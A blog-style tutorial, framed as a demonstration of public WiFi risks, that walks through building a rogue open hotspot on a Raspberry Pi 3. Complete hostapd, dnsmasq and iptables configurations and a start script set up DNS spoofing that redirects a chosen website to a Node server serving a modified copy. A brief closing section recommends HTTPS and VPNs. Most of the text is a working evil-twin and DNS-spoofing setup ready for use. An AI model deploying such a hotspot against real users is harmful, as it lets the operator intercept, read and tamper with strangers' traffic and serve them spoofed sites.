Recently I was demonstrating the dangers of public WiFi, or indeed any untrusted network. Regardless of whether the WiFi has a password or not, the owner of the wireless access points can read, inspect and modify all the data you send over the connection.

To best demonstrate this I set up a rogue WiFi hotspot using a Raspberry Pi 3. The Raspberry Pi was setup to do 4 things:

1. Act as a WiFi hotspot broadcasting a wireless network that did not have a password.
2. Respond to DNS requests from all clients connected to it’s WiFi and had DNS server information obtained by DHCP.
3. Return the access points IP address when a client requested the IP address of a well known website.
4. Run a web server that returns a modified version of the well known website.

Below I take you through the installation and configuration steps necessary to achieve this.

I used Arch Linux on the Raspberry Pi 3 and so it is necessary to follow the ARMv7 installation instructions at https://archlinuxarm.org/platforms/armv8/broadcom/raspberry-pi-3 before continuing.

SSH into the Raspberry Pi using the alarm user with password alarm, change both root and alarm user passwords. (See https://wiki.archlinux.org/index.php/Users_and_groups for those unfamiliar with Arch Linux).

For convenience and security it is recommended to disable password authentication and enable public key authentication. (see https://wiki.archlinux.org/index.php/Secure_Shell#Force_public_key_authentication for those unfamiliar with Arch Linux)

Prepare the Raspberry Pi by executing the following commands as root (using su, see here for more information for those unfamiliar with su).

NOTE: Confirm any prompts that you receive

pacman -Syu
groupadd sudo
usermod -aG sudo alarm
pacman -S --needed base-devel
pacman -S git-core nodejs npm dnsmasq hostapd screen wget

At this point logout and log back in and you should be able to prefix commands that need root privileges with sudo

Create a directory called wifi

mkdir wifi
cd wifi/

create a file called hostapd.conf, in the current directory and populate it’s contents with the following:

beacon_int=100
ssid=Public-Hotspot
interface=wlan0
driver=nl80211
channel=1
ignore_broadcast_ssid=0
ap_isolate=0
hw_mode=g
logger_stdout=-1
logger_stdout_level=0

create a file called dnsmasq.conf, in the current directory and populate it’s contents with the following:

# Configuration file for dnsmasq.

port=53
domain-needed
bogus-priv
server=8.8.8.8
server=8.8.8.4
address=/example.com/192.168.30.1
interface=wlan0
dhcp-range=192.168.30.2,192.168.30.253,255.255.255.0,60m
dhcp-option=vendor:MSFT,2,1i
log-queries
log-dhcp
log-facility=/var/log/dnsmasq.log

NOTE: Replace line 8 with whatever website you wish to redirect to the Pi for modification.

Now we need to update the system to use our local DNS server

sudo systemctl disable systemd-resolved
sudo systemctl stop systemd-resolved
sudo rm /etc/resolv.conf
sudo touch /etc/resolv.conf

modify /etc/resolv.conf so it’s contents are as follows:

nameserver 127.0.0.1
nameserver 8.8.8.8

modify hostapd.conf and dnsmasq.conf to suit your needs and then you’re almost ready.

create a file called start_ap.sh in the current directory and make it executable. Populate it’s contents with the following:

#!/bin/bash

ip link set up dev wlan0
ip addr add 192.168.30.1/24 broadcast 192.168.30.255 dev wlan0

hostapd ./hostapd.conf &

sysctl net.ipv4.ip_forward=1

iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE
iptables -P FORWARD ACCEPT
iptables -A FORWARD -m conntrack --ctstate RELATED,ESTABLISHED -j ACCEPT
iptables -I INPUT -p udp --dport 67 -i wlan0 -j ACCEPT
iptables -I INPUT -p udp --dport 53 -s 192.168.30.0/24 -j ACCEPT
iptables -I INPUT -p tcp --dport 53 -s 192.168.30.0/24 -j ACCEPT

dnsmasq -C ./dnsmasq.conf

cd example.com/
node server.js &
cd ..

Optionally now download an example modified page for the example.com:

wget https://lanphier.co.uk/wp-content/uploads/2016/12/example.tar.gz
tar -xzvf example.tar.gz
cd example.com/
npm install
cd ..

You can now start the wifi hotspot using the following:

#start the WiFi
sudo ./start_ap.sh

As soon as you disconnect from the SSH then the processes launched to create the AP and node server will be terminated. To prevent this run the start wifi command inside of a screen session:

screen -S wifi
sudo ./start_ap.sh

You can detach from the screen by pressing ctrl+a and then ctrl+d. To reattach to the screen at a later date then SSH onto the Raspberry Pi and type

screen -x wifi

Protect against rogue hotspots

Any websites that use HTTPS should create a secure channel that the hotspot cannot read, however the hotspots will still be able to see that you are connecting to those secure sites though they will not be able to see the data you exchange.

The best possible protection is to use a VPN. This creates a secure tunnel to a third party and so all your traffic is secure against the hotspot owner.